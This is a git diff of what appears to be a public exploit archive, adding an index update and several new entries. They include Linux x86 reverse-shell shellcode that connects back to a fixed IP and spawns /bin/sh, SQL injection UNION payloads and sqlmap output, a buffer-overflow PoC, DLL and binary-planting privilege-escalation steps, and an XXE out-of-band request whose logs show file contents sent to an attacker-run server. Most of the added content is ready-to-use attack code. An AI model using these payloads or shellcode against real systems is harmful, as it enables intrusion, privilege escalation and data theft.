SRM - Cross-Site Request Forgery",2016-04-27,"Han Sahin",multiple,webapps,58080 39739,platforms/hardware/webapps/39739.py,"Multiple Vendors (RomPager <= 4.34) - Misfortune Cookie Router Authentication Bypass",2016-04-27,"Milad Doorbash",hardware,webapps,0 39740,platforms/windows/dos/39740.cpp,"Windows - CSRSS BaseSrvCheckVDM Session 0 Process Creation Privilege Escalation (MS16-048)",2016-04-27,"Google Security Research",windows,dos,0 -39741,platforms/osx/local/39741.txt,"Mach Race OS X Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0 +39741,platforms/osx/local/39741.txt,"Mach Race OS X - Local Privilege Escalation Exploit",2016-04-27,fG!,osx,local,0 39742,platforms/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote,0 39743,platforms/windows/dos/39743.txt,"Windows Kernel - win32k.sys TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)",2016-04-28,"Google Security Research",windows,dos,0 39744,platforms/php/webapps/39744.html,"Observium 0.16.7533 - Cross Site Request Forgery",2016-04-29,"Dolev Farhi",php,webapps,80 @@ -36047,7 +36047,7 @@ id,file,description,date,author,platform,type,port 39849,platforms/php/webapps/39849.txt,"XenAPI 1.4.1 for XenForo - Multiple SQL Injections",2016-05-23,"Julien Ahrens",php,webapps,443 39850,platforms/asp/webapps/39850.txt,"AfterLogic WebMail Pro ASP.NET 6.2.6 - Administrator Account Disclosure via XXE Injection",2016-05-24,"Mehmet Ince",asp,webapps,80 39851,platforms/lin_x86/shellcode/39851.c,"Linux x86 TCP Bind Shell Port 4444 (656 bytes)",2016-05-25,"Brandon Dennis",lin_x86,shellcode,0 -39852,platforms/java/remote/39852.rb,"Oracle ATS Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088 +39852,platforms/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload",2016-05-25,metasploit,java,remote,8088 39853,platforms/unix/remote/39853.rb,"Ubiquiti airOS Arbitrary File Upload",2016-05-25,metasploit,unix,remote,443 39854,platforms/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote,0 39855,platforms/php/webapps/39855.txt,"Real Estate Portal 4.1 - Multiple Vulnerabilities",2016-05-26,"Bikramaditya Guha",php,webapps,80 @@ -36068,7 +36068,7 @@ id,file,description,date,author,platform,type,port 39871,platforms/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",cgi,webapps,80 39872,platforms/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple vulnerabilities",2016-05-31,"Mickael Dorigny",php,webapps,80 39873,platforms/linux/dos/39873.py,"CCextractor 0.80 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 -39874,platforms/windows/remote/39874.rb,"Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 +39874,platforms/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote,0 39875,platforms/linux/dos/39875.py,"TCPDump 4.5.1 - Crash PoC",2016-05-31,"David Silveiro",linux,dos,0 39876,platforms/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,php,webapps,80 39877,platforms/multiple/dos/39877.txt,"Wireshark - erf_meta_read_tag SIGSEGV",2016-06-01,"Google Security Research",multiple,dos,0 @@ -36246,3 +36246,12 @@ id,file,description,date,author,platform,type,port 40067,platforms/linux/remote/40067.rb,"Nagios XI Chained Remote Code Execution",2016-07-06,metasploit,linux,remote,80 40068,platforms/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",php,webapps,80 40069,platforms/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",windows,local,0 +40070,platforms/php/webapps/40070.txt,"WordPress Lazy Content Slider Plugin 3.4 - (Add Catetory) CSRF",2016-07-08,"Persian Hack Team",php,webapps,80 +40071,platforms/windows/local/40071.txt,"Hide.Me VPN Client 1.2.4 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 +40072,platforms/windows/local/40072.txt,"InstantHMI 6.1 - Privilege Escalation",2016-07-08,sh4d0wman,windows,local,0 +40073,platforms/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0 +40074,platforms/windows/dos/40074.txt,"Microsoft WinDbg logviewer.exe - Crash PoC",2016-07-08,hyp3rlinx,windows,dos,0 +40075,platforms/lin_x86/shellcode/40075.c,"Linux x86 TCP Reverse Shellcode - 75 bytes",2016-07-08,sajith,lin_x86,shellcode,0 +40076,platforms/php/webapps/40076.php,"php Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",php,webapps,80 +40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 +40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 diff --git a/platforms/lin_x86/shellcode/40075.c b/platforms/lin_x86/shellcode/40075.c new file mode 100755 index 000000000..1c2f866f6 --- /dev/null +++ b/platforms/lin_x86/shellcode/40075.c @@ -0,0 +1,177 @@ +/* +# Linux x86 TCP Reverse Shellcode (75 bytes) +# Author: sajith +# Tested on: i686 GNU/Linux +# Shellcode Length: 75 +# SLAE - 750 + +------------c prog ---poc by sajith shetty---------- + +#include +#include +#include +#include + +int main(void) + +{ + +int sock_file_des; +struct sockaddr_in sock_ad; +//[1] create socket connection +//Man page: socket(int domain, int type, int protocol); +sock_file_des = socket(AF_INET, SOCK_STREAM, 0); + + +//[2]connect back to attacker machine (ip= 192.168.227.129) +//Man page: int connect(int sockfd, const struct sockaddr *addr,socklen_t addrlen); + +sock_ad.sin_family = AF_INET; +sock_ad.sin_port = htons(4444); +sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); +connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad)); +//[3]Redirect file descriptors (STDIN, STDOUT and STDERR) to the socket using DUP2 +//Man page: int dup2(int oldfd, int newfd); + +dup2(sock_file_des, 0); // stdin +dup2(sock_file_des, 1); // stdout +dup2(sock_file_des, 2); // stderr + +//[4]Execute shell (here we use /bin/sh) using execve call + +//[*]Man page for execve call +//int execve(const char *filename, char *const argv[],char *const envp[]); + +execve("/bin/sh", 0, 0); +} +----------------------end of c program-------------- + +global _start + +section .text + +_start: + ;[1] create socket connection +;Man page: socket(int domain, int type, int protocol); +;sock_file_des = socket(2,1,0) + + xor edx, edx + push 0x66 ; socket call(0x66) + pop eax + push edx ; protocol = 0 + inc edx + push edx ; sock_stream = 1 + mov ebx, edx ; EBX =1 + inc edx + push edx ; AF_INET =2 + mov ecx, esp ; save the pointer to args in ecx register + int 0x80 ; call socketcall() + + ; int dup2(int oldfd, int newfd); + mov ebx, eax ; store sock_file_des in ebx register + mov ecx, edx ; counter = 2 + loop: + mov al, 0x3f + int 0x80 + dec ecx + jns loop +; sock_ad.sin_family = AF_INET; +;sock_ad.sin_port = htons(4444); +;sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); +;connect(sock_file_des,(struct sockaddr *) &sock_ad,sizeof(sock_ad)); +xchg ebx, edx ; before xchg edx=2 and ebx=sock_file_des and after xchg ebx=2, edx=sock_file_des + push 0x81e3a8c0 ; sock_ad.sin_addr.s_addr = inet_addr("192.168.227.129"); + push word 0x5C11 ; sock_ad.sin_port = htons(4444); + push word bx ; sock_ad.sin_family = AF_INET =2; + mov ecx, esp ; pointer to struct + + mov al, 0x66 ; socket call (0x66) + inc ebx ; connect (3) + push 0x10 ; sizeof(struct sockaddr_in) + push ecx ; &serv_addr + push edx ; sock_file_des + mov ecx, esp ; save the pointer to args in ecx register + int 0x80 + + mov al, 11 ; execve system call + cdq ; overwriting edx with either 0 (if eax is positive) + push edx ; push null + push 0x68732f6e ; hs/b + push 0x69622f2f ; ib// + mov ebx,esp ; save pointer + push edx ; push null + push ebx ; push pointer + mov ecx,esp ; save pointer + int 0x80 + +-------------obj dump------------ +rev_shell1: file format elf32-i386 + + +Disassembly of section .text: + +08048060 <_start>: + 8048060: 31 d2 xor edx,edx + 8048062: 6a 66 push 0x66 + 8048064: 58 pop eax + 8048065: 52 push edx + 8048066: 42 inc edx + 8048067: 52 push edx + 8048068: 89 d3 mov ebx,edx + 804806a: 42 inc edx + 804806b: 52 push edx + 804806c: 89 e1 mov ecx,esp + 804806e: cd 80 int 0x80 + 8048070: 89 c3 mov ebx,eax + 8048072: 89 d1 mov ecx,edx + +08048074 : + 8048074: b0 3f mov al,0x3f + 8048076: cd 80 int 0x80 + 8048078: 49 dec ecx + 8048079: 79 f9 jns 8048074 + 804807b: 87 da xchg edx,ebx + 804807d: 68 c0 a8 e3 81 push 0x81e3a8c0 + 8048082: 66 68 11 5c pushw 0x5c11 + 8048086: 66 53 push bx + 8048088: 89 e1 mov ecx,esp + 804808a: b0 66 mov al,0x66 + 804808c: 43 inc ebx + 804808d: 6a 10 push 0x10 + 804808f: 51 push ecx + 8048090: 52 push edx + 8048091: 89 e1 mov ecx,esp + 8048093: cd 80 int 0x80 + 8048095: b0 0b mov al,0xb + 8048097: 99 cdq + 8048098: 52 push edx + 8048099: 68 6e 2f 73 68 push 0x68732f6e + 804809e: 68 2f 2f 62 69 push 0x69622f2f + 80480a3: 89 e3 mov ebx,esp + 80480a5: 52 push edx + 80480a6: 53 push ebx + 80480a7: 89 e1 mov ecx,esp + 80480a9: cd 80 int 0x80 + +----------------------------------------------- +gcc -fno-stack-protector -z execstack shellcode.c -o shellcode +*/ + +#include +#include + +unsigned char code[] = \ + +"\x31\xd2\x6a\x66\x58\x52\x42\x52\x89\xd3\x42\x52\x89\xe1\xcd\x80\x89\xc3\x89\xd1\xb0\x3f\xcd\x80\x49\x79\xf9\x87\xda\x68" +"\xc0\xa8\xe3\x81" //IP address 192.168.227.129 +"\x66\x68" +"\x11\x5c" // port 4444 +"\x66\x53\x89\xe1\xb0\x66\x43\x6a\x10\x51\x52\x89\xe1\xcd\x80\xb0\x0b\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xcd\x80"; + + +main() +{ + printf("Shellcode Length: %d\n", strlen(code)); +int (*ret)() = (int(*)())code; +ret(); +} \ No newline at end of file diff --git a/platforms/php/webapps/40070.txt b/platforms/php/webapps/40070.txt new file mode 100755 index 000000000..bc6e1a770 --- /dev/null +++ b/platforms/php/webapps/40070.txt @@ -0,0 +1,30 @@ +###################### +# Exploit Title : WordPress Lazy content Slider Plugin - CSRF Vulnerability +# Exploit Author : Persian Hack Team +# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider +# Category: [ Webapps ] +# Tested on: [ Win ] +# Version: 3.4 +# Date: 2016/07/08 +###################### +# +# PoC: +# The vulnerable page is +# /wp-content/plugins/lazy-content-slider/lzcs_admin.php +# The Code for CSRF.html is + + +
+ + + + +
+ + +# +###################### +# Discovered by : Mojtaba MobhaM +# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members +# Homepage : http://persian-team.ir +###################### \ No newline at end of file diff --git a/platforms/php/webapps/40076.php b/platforms/php/webapps/40076.php new file mode 100755 index 000000000..d0685f44b --- /dev/null +++ b/platforms/php/webapps/40076.php @@ -0,0 +1,35 @@ +# Exploit Title: php Real Estate Script Arbitrary File Disclosure +# Date: 2016-07-08 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: http://www.realestatescript.eu/ +# Version: v.3 +# Download Link : http://www.realestatescript.eu/downloads/realestatescript-v3.zip + +Exploit : + diff --git a/platforms/php/webapps/40078.txt b/platforms/php/webapps/40078.txt new file mode 100755 index 000000000..09485ff63 --- /dev/null +++ b/platforms/php/webapps/40078.txt @@ -0,0 +1,55 @@ +###################### +# Application Name : Streamo - Online Radio And Tv Streaming CMS + +# Google Dork : inurl:rjdetails.php?id= + +# Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL + +# Author Contact : https://twitter.com/byn4tural + +# Vendor Homepage : http://rexbd.net/ + +# Vulnerable Type : SQL Injection + +# Date : 2016-07-08 + +# Tested on : Windows 10 / Mozilla Firefox +# Linux / Mozilla Firefox +# Linux / sqlmap 1.0.6.28#dev + +###################### SQL Injection Vulnerability ###################### + +# Location : +http://localhost/[path]/menu.php +http://localhost/[path]/programs.php +http://localhost/[path]/rjdetails.php + +###################### + +# Vulnerable code : + +$gid = $_GET["id"]; + + +###################### + +# PoC Exploit: + +http://localhost/[path]/programs.php?id=999999.9%27%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%20and%20%27x%27%3D%27x + +# Exploit Code via sqlmap: + +sqlmap -u http://localhost/[path]/programs.php?id=10 --dbs + +Parameter: id (GET) + Type: AND/OR time-based blind + Title: MySQL >= 5.0.12 AND time-based blind + Payload: id=10' AND SLEEP(5) AND 'yTqi'='yTqi + + Type: UNION query + Title: Generic UNION query (NULL) - 2 columns + Payload: id=-4222' UNION ALL SELECT NULL,CONCAT(0x7170787871,0x586d5a4275566c486f6f78475a59506c524f5762506944746c7358645a544e527874737478756364,0x7178627071)-- uFiY +--- + +###################### + diff --git a/platforms/windows/dos/40073.py b/platforms/windows/dos/40073.py new file mode 100755 index 000000000..f867cd4d5 --- /dev/null +++ b/platforms/windows/dos/40073.py @@ -0,0 +1,99 @@ +''' +[+] Credits: HYP3RLINX +[+] Website: hyp3rlinx.altervista.org +[+] Source: http://hyp3rlinx.altervista.org/advisories/MS-KILL-UTILITY-BUFFER-OVERFLOW.txt +[+] ISR: ApparitionSec + + +Vendor: +================= +www.microsoft.com + + +Product: +========================================= +Microsoft Process Kill Utility "kill.exe" +File version: 6.3.9600.17298 + +The Kill tool (kill.exe), a tool used to terminate a process, part of the +WinDbg program. + + +Vulnerability Type: +=================== +Buffer Overflow + + +SEH Buffer Overflow @ about 512 bytes + + +Vulnerability Details: +===================== + +Register dump + + +'SEH chain of main thread +Address SE handler +001AF688 kernel32.756F489B +001AFBD8 52525252 +42424242 *** CORRUPT ENTRY *** + + +001BF81C 41414141 AAAA +001BF820 41414141 AAAA +001BF824 41414141 AAAA +001BF828 41414141 AAAA +001BF82C 41414141 AAAA +001BF830 41414141 AAAA +001BF834 909006EB ë Pointer to next SEH record +001BF838 52525252 RRRR SE handler <================ +001BF83C 90909090 +001BF840 90909090 + + +Exploit code(s): +================ + +Python POC. +''' + +junk="A"*508+"RRRR" + +pgm='c:\\Program Files (x86)\\Windows Kits\\8.1\\Debuggers\\x86\\kill.exe ' +subprocess.Popen([pgm, junk], shell=False) + + +''' +Disclosure Timeline: +================================== +Vendor Notification: June 24, 2016 +Vendor reply: Will not security service +July 8, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Local + + +Severity Level: +================ +Low + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX +''' \ No newline at end of file diff --git a/platforms/windows/dos/40074.txt b/platforms/windows/dos/40074.txt new file mode 100755 index 000000000..272bab0d7 --- /dev/null +++ b/platforms/windows/dos/40074.txt @@ -0,0 +1,230 @@ +[+] Credits: HYP3RLINX + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/MS-WINDBG-LOGVIEWER-BUFFER-OVERFLOW.txt + +[+] ISR: ApparitionSec + + +Vendor: +================= +www.microsoft.com + + +Product: +==================== +WinDbg logviewer.exe + +LogViewer (logviewer.exe), a tool that displays the logs created, part of +WinDbg application. + + +Vulnerability Type: +=================== +Buffer Overflow DOS + + +Vulnerability Details: +===================== + +Buffer overflow in WinDbg "logviewer.exe" when opening corrupted .lgv +files. App crash then Overwrite of MMX registers etc... +this utility belongs to Windows Kits/8.1/Debuggers/x86 + +Read Access Violation / Memory Corruption +Win32 API Log Viewer +6.3.9600.17298 +Windbg x86 +logviewer.exe +Log Viewer 3.01 for x86 + + +(5fb8.32fc): Access violation - code c0000005 (first chance) +First chance exceptions are reported before any exception handling. +This exception may be expected and handled. +*** ERROR: Symbol file could not be found. Defaulted to export symbols for +C:\Windows\syswow64\msvcrt.dll - +eax=013dad30 ebx=005d0000 ecx=00000041 edx=00000000 esi=005d2000 +edi=013dcd30 +eip=754fa048 esp=0009f840 ebp=0009f848 iopl=0 nv up ei pl nz na pe +nc +cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b +efl=00210206 +msvcrt!memmove+0x1ee: +754fa048 660f6f06 movdqa xmm0,xmmword ptr [esi] +ds:002b:005d2000=???????????????????????????????? + +gs 2b +fs 53 +es 2b +ds 2b +edi 136cd30 +esi 7d2000 +ebx 7d0000 +edx 0 +ecx 41 +eax 136ad30 +ebp df750 +eip 754fa048 +cs 23 +efl 210206 +esp df748 +ss 2b +dr0 0 +dr1 0 +dr2 0 +dr3 0 +dr6 0 +dr7 0 +di cd30 +si 2000 +bx 0 +dx 0 +cx 41 +ax ad30 +bp f750 +ip a048 +fl 206 +sp f748 +bl 0 +dl 0 +cl 41 +al 30 +bh 0 +dh 0 +ch 0 +ah ad +fpcw 27f +fpsw 4020 +fptw ffff +fopcode 0 +fpip 76454c1e +fpipsel 23 +fpdp 6aec2c +fpdpsel 2b +st0 -1.00000000000000e+000 +st1 -1.00000000000000e+000 +st2 -1.00000000000000e+000 +st3 9.60000000000000e+001 +st4 1.08506945252884e-004 +st5 -1.00000000000000e+000 +st6 0.00000000000000e+000 +st7 0.00000000000000e+000 +mm0 0:2:2:2 +mm1 0:0:2:202 +mm2 0:1:1:1 +mm3 c000:0:0:0 +mm4 e38e:3900:0:0 +mm5 0:0:0:0 +mm6 0:0:0:0 +mm7 0:0:0:0 +mxcsr 1fa0 +xmm0 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm1 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm2 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm3 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm4 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm5 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm6 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +xmm7 1.207843e+001: 1.207843e+001: 1.207843e+001: 1.207843e+001 +iopl 0 +of 0 +df 0 +if 1 +tf 0 +sf 0 +zf 0 +af 0 +pf 1 +cf 0 +vip 0 +vif 0 +xmm0l 4141:4141:4141:4141 +xmm1l 4141:4141:4141:4141 +xmm2l 4141:4141:4141:4141 +xmm3l 4141:4141:4141:4141 +xmm4l 4141:4141:4141:4141 +xmm5l 4141:4141:4141:4141 +xmm6l 4141:4141:4141:4141 +xmm7l 4141:4141:4141:4141 +xmm0h 4141:4141:4141:4141 +xmm1h 4141:4141:4141:4141 +xmm2h 4141:4141:4141:4141 +xmm3h 4141:4141:4141:4141 +xmm4h 4141:4141:4141:4141 +xmm5h 4141:4141:4141:4141 +xmm6h 4141:4141:4141:4141 +xmm7h 4141:4141:4141:4141 +xmm0/0 41414141 +xmm0/1 41414141 +xmm0/2 41414141 +xmm0/3 41414141 +xmm1/0 41414141 +xmm1/1 41414141 +xmm1/2 41414141 +xmm1/3 41414141 +xmm2/0 41414141 +xmm2/1 41414141 +xmm2/2 41414141 +xmm2/3 41414141 +xmm3/0 41414141 +xmm3/1 41414141 +xmm3/2 41414141 +xmm3/3 41414141 +xmm4/0 41414141 +xmm4/1 41414141 +xmm4/2 41414141 +xmm4/3 41414141 +xmm5/0 41414141 +xmm5/1 41414141 +xmm5/2 41414141 +xmm5/3 41414141 +xmm6/0 41414141 +xmm6/1 41414141 +xmm6/2 41414141 +xmm6/3 41414141 +xmm7/0 41414141 +xmm7/1 41414141 +xmm7/2 41414141 +xmm7/3 41414141 + + +Exploit code(s): +=============== + +1) create .lgv file with bunch of 'A's length of 4096 overwrites XXM +registers, ECX etc +2) run from command line pipe the file to it to watch it crash and burn. + +/////////////////////////////////////////////////////////////////////// + + +Disclosure Timeline: +=============================== +Vendor Notification: June 23, 2016 +Vendor acknowledged: July 1, 2016 +Vendor reply: Will not fix (stability issue) +July 8, 2016 : Public Disclosure + + +Severity Level: +================ +Low + + +[+] Disclaimer +The information contained within this advisory is supplied "as-is" with no +warranties or guarantees of fitness of use or otherwise. +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and +that due credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit +is given to the author. The author is not responsible for any misuse of the +information contained herein and accepts no responsibility +for any damage caused by the use or misuse of this information. The author +prohibits any malicious use of security related information +or exploits by the author or elsewhere. + +HYP3RLINX diff --git a/platforms/windows/local/40071.txt b/platforms/windows/local/40071.txt new file mode 100755 index 000000000..0a33173fc --- /dev/null +++ b/platforms/windows/local/40071.txt @@ -0,0 +1,72 @@ +Title: Hide.Me VPN Client - EoP: User to SYSTEM +CWE Class: CWE-276: Incorrect Default Permissions +Date: 01/06/2016 +Vendor: eVenture +Product: Hide.Me VPN Client +Version: 1.2.4 +Download link: https://hide.me/en/software/windows +Tested on: Windows 7 x86, fully patched +Release mode: no bugbounty program, public release + +Installer Name: Hide.me-Setup-1.2.4.exe +MD5: e5e5e2fa2c9592660a180357c4482740 +SHA1: 4729c45d6399c759cd8f6a0c5773e08c6c57e034 + +- 1. Introduction: - +The installer automatically creates a folder named "hide.me VPN" under +c:\program files\ for the software. +No other location can be specified during installation. + +The folder has insecure permissions allowing EVERYONE the WRITE permission. +Users can replace binaries or plant malicious DLLs to obtain elevated privileges. + +As the software is running one executable as service under SYSTEM +permissions an attacker could elevate from regular user to SYSTEM. + +- 2. Technical Details/PoC: - +A. Obtain and execute the installer. +B. Observe there is no prompt to specify an installation location. +C. Review permissions under the Explorer Security tab or run icacls.exe + +Example: + +C:\Program Files\hide.me VPN Everyone:(OI)(CI)(M) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + +Successfully processed 1 files; Failed processing 0 files + +C. A user can overwrite an executable or drop a malicious DLL to obtain code execution. +The highest permissions are reached by overwriting the service executable: vpnsvc.exe + +However it is running at startup and can't be stopped by a non-privileged user. + +As we can write to the directory we can rename all of the DLL's to DLL.old + +C:\Program Files\hide.me VPN\Common.dll +C:\Program Files\hide.me VPN\SharpRaven.dll +C:\Program Files\hide.me VPN\ComLib.dll +C:\Program Files\hide.me VPN\vpnlib.dll +C:\Program Files\hide.me VPN\Newtonsoft.Json.dll +C:\Program Files\hide.me VPN\DotRas.dll + +Once renamed, reboot the machine, log on as normal user. + +E. Observe both application AND the system service have crashed. +Now replace vpnsvc.exe with a malicious copy. +Place back all original DLLS and reboot. + +Our code will get executed under elevated permissions: SYSTEM. + +- 3. Mitigation: - +A. set appropriate permissions on the application folder. + +- 4. Author: - +sh4d0wman diff --git a/platforms/windows/local/40072.txt b/platforms/windows/local/40072.txt new file mode 100755 index 000000000..ecc190a47 --- /dev/null +++ b/platforms/windows/local/40072.txt @@ -0,0 +1,56 @@ +Title: InstantHMI - EoP: User to ADMIN +CWE Class: CWE-276: Incorrect Default Permissions +Date: 01/06/2016 +Vendor: Software Horizons +Product: InstantHMI +Version: 6.1 +Download link: http://www.instanthmi.com/ihmisoftware.htm +Tested on: Windows 7 x86, fully patched +Release mode: no bugbounty program, public release + +Installer Name: IHMI61-PCInstall-Unicode.exe +MD5: ee3ca3181c51387d89de19e89aea0b31 +SHA1: c3f1929093a3bc28f4f8fdd9cb38b1455d7f0d6f + +- 1. Introduction: - +During a standard installation (default option) the installer +automatically creates a folder named "IHMI-6" in the root drive. +No other location can be specified during standard installation. + +As this folder receives default permissions AUTHENTICATED USERS +are given the WRITE permission. + +Because of this they can replace binaries or plant malicious +DLLs to obtain elevated, administrative level, privileges. + +- 2. Technical Details/PoC: - +A. Obtain and execute the installer. + +B. Observe there is no prompt for the installation location. + +C. Review permissions under the Explorer Security tab or run icacls.exe + +Example: + +IHMI-6 BUILTIN\Administrators:(I)(F) + BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(OI)(CI)(RX) + NT AUTHORITY\Authenticated Users:(I)(M) + NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M) + +Successfully processed 1 files; Failed processing 0 files + +D. Change the main executable: InstantHMI.exe with a malicious copy. + +E. Once executed by an administrator our code will run +under administrator level privileges. + +- 3. Mitigation: - +A. Install under "c:\program files" or "C:\Program Files (x86)" + +B. set appropriate permissions on the application folder. + +- 4. Author: - +sh4d0wman diff --git a/platforms/xml/webapps/40077.txt b/platforms/xml/webapps/40077.txt new file mode 100755 index 000000000..782b580bf --- /dev/null +++ b/platforms/xml/webapps/40077.txt @@ -0,0 +1,135 @@ +CyberPower Systems PowerPanel 3.1.2 XXE Out-Of-Band Data Retrieval + + +Vendor: CyberPower Systems, Inc. +Product web page: https://www.cyberpowersystems.com +Affected version: 3.1.2 (37567) Business Edition + +Summary: The PowerPanel® Business Edition software from +CyberPower provides IT professionals with the tools they +need to easily monitor and manage their backup power. +Available for compatible CyberPower UPS models, this +software supports up to 250 clients, allowing users remote +access (from any network PC with a web browser) to instantly +access vital UPS battery conditions, load levels, and runtime +information. Functionality includes application/OS shutdown, +event logging, hibernation mode, internal reports and analysis, +remote management, and more. + +Desc: PowerPanel suffers from an unauthenticated XML External +Entity (XXE) vulnerability using the DTD parameter entities +technique resulting in disclosure and retrieval of arbitrary +data on the affected node via out-of-band (OOB) attack. The +vulnerability is triggered when input passed to the xmlservice +servlet using the ppbe.xml script is not sanitized while parsing the +xml inquiry payload returned by the JAXB element translation. + +================================================================ + +C:\Program Files (x86)\CyberPower PowerPanel Business Edition\ +\web\work\ROOT\webapp\WEB-INF\classes\com\cyberpowersystems\ppbe\webui\xmlservice\ +------------------------ +XmlServiceServlet.class: +------------------------ + +94: private InquirePayload splitInquirePayload(InputStream paramInputStream) +95: throws RequestException +96: { +97: try +98: { +99: JAXBContext localJAXBContext = JAXBContext.newInstance("com.cyberpowersystems.ppbe.core.xml.inquiry"); +100: Unmarshaller localUnmarshaller = localJAXBContext.createUnmarshaller(); +101: JAXBElement localJAXBElement = (JAXBElement)localUnmarshaller.unmarshal(paramInputStream); +102: return (InquirePayload)localJAXBElement.getValue(); +103: } +104: catch (JAXBException localJAXBException) +105: { +106: localJAXBException.printStackTrace(); +107: throw new RequestException(Error.INQUIRE_PAYLOAD_CREATE_FAIL, "Translate input to JAXB object failed."); +108: } +109: } + +--- + +C:\Program Files (x86)\CyberPower PowerPanel Business Edition\web\work\ROOT\webapp\WEB-INF\ +-------- +web.xml: +-------- + +28: +29: xmlService +30: com.cyberpowersystems.ppbe.webui.xmlservice.XmlServiceServlet +31: 3 +32: +.. +.. +60: +61: xmlService +62: /ppbe.xml +63: + +================================================================ + + +Tested on: Microsoft Windows 7 Ultimate SP1 EN + Microsoft Windows 8 + Microsoft Windows Server 2012 + Linux (64bit) + MacOS X 10.6 + Jetty(7.5.0.v20110901) + Java/1.8.0_91-b14 + SimpleHTTP/0.6 Python/2.7.1 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2016-5338 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5338.php + + +22.06.2016 + +-- + + +C:\data\xxe.xml: +---------------- + + + "> + + +Request: +-------- + +POST /client/ppbe.xml HTTP/1.1 +Host: localhost:3052 +Content-Length: 258 +User-Agent: XXETester/1.0 +Connection: close + + + +%remote; +%root; +%oob;]> + + +action.notification.recipient.present + + + + + + +Response: +--------- + +C:\data>python -m SimpleHTTPServer 8011 +Serving HTTP on 0.0.0.0 port 8011 ... +lab07.home - - [03/Jul/2016 13:09:04] "GET /xxe.xml HTTP/1.1" 200 - +lab07.home - - [03/Jul/2016 13:09:04] "GET /?%5BMail%5D%0ACMCDLLNAME32=mapi32.dll%0ACMC=1%0AMAPI=1%0AMAPIX=1%0AMAPIXVER=1.0.0.1%0AOLEMessaging=1%0A HTTP/1.1" 301 - +lab07.home - - [03/Jul/2016 